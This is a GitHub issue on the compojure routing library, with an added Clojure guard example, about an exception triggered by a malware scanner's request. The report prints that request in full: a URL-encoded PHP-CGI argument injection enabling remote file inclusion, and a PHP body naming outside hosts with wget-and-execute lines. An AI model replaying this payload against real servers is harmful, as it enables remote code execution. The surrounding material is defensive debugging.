weavejester / compojure

A concise routing library for Ring/Clojure
Eclipse Public License 1.0

Malware requests causing exceptions in assoc_route_params #115

Closed wiseman closed 10 years ago

wiseman commented 10 years ago

With compojure 1.1.8 I get exceptions from some malware scan requests.

The exception:

java.lang.ClassCastException: java.lang.String cannot be cast to clojure.lang.IPersistentCollection
    at clojure.core$conj.invoke(core.clj:83) ~[clojure-1.5.1.jar:na]
    at clojure.core$merge$fn__4275.invoke(core.clj:2684) ~[clojure-1.5.1.jar:na]
    at clojure.core$reduce1.invoke(core.clj:896) ~[clojure-1.5.1.jar:na]
    at clojure.core$reduce1.invoke(core.clj:887) ~[clojure-1.5.1.jar:na]
    at clojure.core$merge.doInvoke(core.clj:2684) ~[clojure-1.5.1.jar:na]
    at clojure.lang.RestFn.invoke(RestFn.java:421) ~[clojure-1.5.1.jar:na]
    at clojure.core$merge_with$merge_entry__4279.invoke(core.clj:2698) ~[clojure-1.5.1.jar:na]
    at clojure.core$reduce1.invoke(core.clj:896) ~[clojure-1.5.1.jar:na]
    at clojure.core$merge_with$merge2__4281.invoke(core.clj:2701) ~[clojure-1.5.1.jar:na]
    at clojure.core$reduce1.invoke(core.clj:896) ~[clojure-1.5.1.jar:na]
    at clojure.core$reduce1.invoke(core.clj:887) ~[clojure-1.5.1.jar:na]
    at clojure.core$merge_with.doInvoke(core.clj:2702) ~[clojure-1.5.1.jar:na]
    at clojure.lang.RestFn.invoke(RestFn.java:439) ~[clojure-1.5.1.jar:na]
    at compojure.core$assoc_route_params.invoke(core.clj:38) ~[na:na]
    at compojure.core$if_route$fn__771.invoke(core.clj:45) ~[na:na]
    at compojure.core$if_method$fn__764.invoke(core.clj:30) ~[na:na]
    at compojure.core$routing$fn__793.invoke(core.clj:112) ~[na:na]
    at clojure.core$some.invoke(core.clj:2443) ~[clojure-1.5.1.jar:na]
    at compojure.core$routing.doInvoke(core.clj:112) ~[na:na]
    at clojure.lang.RestFn.applyTo(RestFn.java:139) ~[clojure-1.5.1.jar:na]
    at clojure.core$apply.invoke(core.clj:619) ~[clojure-1.5.1.jar:na]
    at compojure.core$routes$fn__797.invoke(core.clj:117) ~[na:na]
    at ring.middleware.keyword_params$wrap_keyword_params$fn__7655.invoke(keyword_params.clj:35) ~[na:na]
    at ring.middleware.nested_params$wrap_nested_params$fn__7704.invoke(nested_params.clj:84) ~[na:na]
    at ring.middleware.params$wrap_params$fn__7621.invoke(params.clj:64) ~[na:na]
    at ring.middleware.multipart_params$wrap_multipart_params$fn__7747.invoke(multipart_params.clj:118) ~[na:na]
    at ring.middleware.flash$wrap_flash$fn__8522.invoke(flash.clj:35) ~[na:na]
    at ring.middleware.session$wrap_session$fn__8502.invoke(session.clj:98) ~[na:na]
    at com.morseproject.hurdygurdy.server$wrap_http_status_ex$fn__8556.invoke(server.clj:148) ~[na:na]
    at com.morseproject.hurdygurdy.server$wrap_exception$fn__8614.invoke(server.clj:310) ~[na:na]
    at ring.middleware.json$wrap_json_response$fn__6418.invoke(json.clj:65) [na:na]
    at org.httpkit.server.HttpHandler.run(RingHandler.java:91) [http-kit-2.1.17.jar:na]
    at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:471) [na:1.7.0_55]
    at java.util.concurrent.FutureTask.run(FutureTask.java:262) [na:1.7.0_55]
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) [na:1.7.0_55]
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) [na:1.7.0_55]
    at java.lang.Thread.run(Thread.java:744) [na:1.7.0_55]

The request:

POST /info.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Connection: Keep-Alive
Content-Length: 538
Content-Type: application/x-www-form-urlencoded
Host: localhost
User-Agent: I'm a mu mu mu ?

<?php
$tmp = sys_get_temp_dir();
$path = getcwd();
$file = "gimp.html";
$url = "http://eleven11root.servepics.com";
//system("wget $url -P - -O" . $tmp . "/gimp.html");
//system("chmod -R 777" . $tmp ."/gimp.html");
chmod ($tmp."/".$file,0777);
//system($tmp . "/gimp.html");
$file2 = "g1mp.htm";
$url2 = "http://twelfe12root.servepics.com";
//system("wget $url2 -P - -O" . $tmp . "/g1mp.htm");
//system("chmod -R 777" . $tmp ."/g1mp.htm");
chmod ($tmp."/".$file2,0777);
//system($tmp . "/g1mp.htm");
echo $tmp;
echo $path;

die($tmp);
?>

weavejester commented 10 years ago

Let's keep this to the original issue, https://github.com/ring-clojure/ring/issues/155, until we can actually reproduce it. Compojure is throwing an error because it's been fed a malformed request, but that doesn't mean Compojure is causing the malformed request. I'm closing this issue so that we're not dealing with this problem in two projects.
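An added illustration, not code from the compojure or ring projects, of how a request like the one above can reach the ClassCastException in the stack trace, and of a guard a deployment could put in front of its routes. It assumes that ring.util.codec/form-decode returns a plain String rather than a map when the encoded query contains no literal "=" (every "=" in the request above is %3D) and that compojure 1.1.x's assoc-route-params merged route params with merge-with merge; the guard middleware and all names below are hypothetical.

```clojure
(ns example.params-guard
  (:require [ring.util.codec :as codec]))

;; Constructed query string: "a=b" with the "=" percent-encoded. Like the
;; scanner request in the issue, it contains no literal "=" or "&".
(def encoded-query "%61%3D%62")

;; Assumption: form-decode only builds a map when it sees a literal "=";
;; otherwise it returns the decoded String, here "a=b" rather than {"a" "b"}.
(def decoded-params (codec/form-decode encoded-query))

;; Simplified version of what compojure 1.1.x did: merge route params into
;; :params. If :params is a String, merge calls conj on it, which is the
;; "String cannot be cast to IPersistentCollection" in the trace above.
(defn assoc-route-params-unsafe [request params]
  (merge-with merge request {:route-params params :params params}))

;; Hypothetical guard, not the project's fix: anything that is not a map is
;; treated as "no parameters" before the routing layer sees it.
(defn- ->param-map [x]
  (if (map? x) x {}))

(defn wrap-map-params
  "Middleware that coerces :params, :query-params and :form-params to maps.
  Place it between wrap-params and the compojure routes."
  [handler]
  (fn [request]
    (handler (reduce (fn [req k]
                       (if (contains? req k)
                         (update-in req [k] ->param-map)
                         req))
                     request
                     [:params :query-params :form-params]))))

;; Constructed request as wrap-params would hand it on: :params is a String.
(def bad-request
  {:request-method :post
   :uri "/info.php"
   :query-params decoded-params
   :params decoded-params})

(defn route-handler [request]
  (assoc-route-params-unsafe request {:id "1"}))

(comment
  (route-handler bad-request)                      ; throws ClassCastException
  ((wrap-map-params route-handler) bad-request)    ; :params {:id "1"}, no throw
  )
```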